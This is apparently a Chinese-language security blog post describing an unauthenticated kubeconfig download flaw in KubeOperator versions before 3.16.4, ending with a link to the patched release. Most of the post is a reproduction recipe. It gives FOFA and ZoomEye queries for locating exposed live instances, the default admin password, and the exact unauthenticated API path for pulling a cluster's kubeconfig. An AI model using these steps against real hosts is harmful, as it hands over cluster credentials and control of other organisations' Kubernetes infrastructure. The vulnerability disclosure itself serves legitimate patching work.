0x01 漏洞描述
一个开源的轻量级 Kubernetes 发行版,专注于帮助企业规划、部署和运营生产级别的 K8s 集群。KubeOperator 3.16.4之前版本存在授权问题漏洞,该漏洞源于API与未经授权的实体交互,由于下载kubeconfig的路径不需要身份认证,导致攻击者可直接下载kubeconfig获取相关敏感信息
0x02 影响版本
KubeOperator < 3.16.4
0x03 漏洞复现
FOFA空间搜索引擎语句
app="KubeOperator" && status_code="200"
ZoomEye空间搜索引擎语法
title:"KubeOperator"
登录页面是这个酱紫
默认账号密码
admin
kubeoperator@admin23
注意这个集群名称,未授权的时候会用到
访问该接口+集群名称当集群存在时即可通过接口未授权下载配置文件
http://ip/api/v1/clusters/kubeconfig/stable-cluster
0x04 修复方案
官方已给出修复方案建议及时更新补丁
https://github.com/KubeOperator/KubeOperator/releases/tag/v3.16.4
往期回顾
关注我
获得更多精彩
觉得内容不错,就点下“赞”和“在看”
如侵权请私聊公众号删文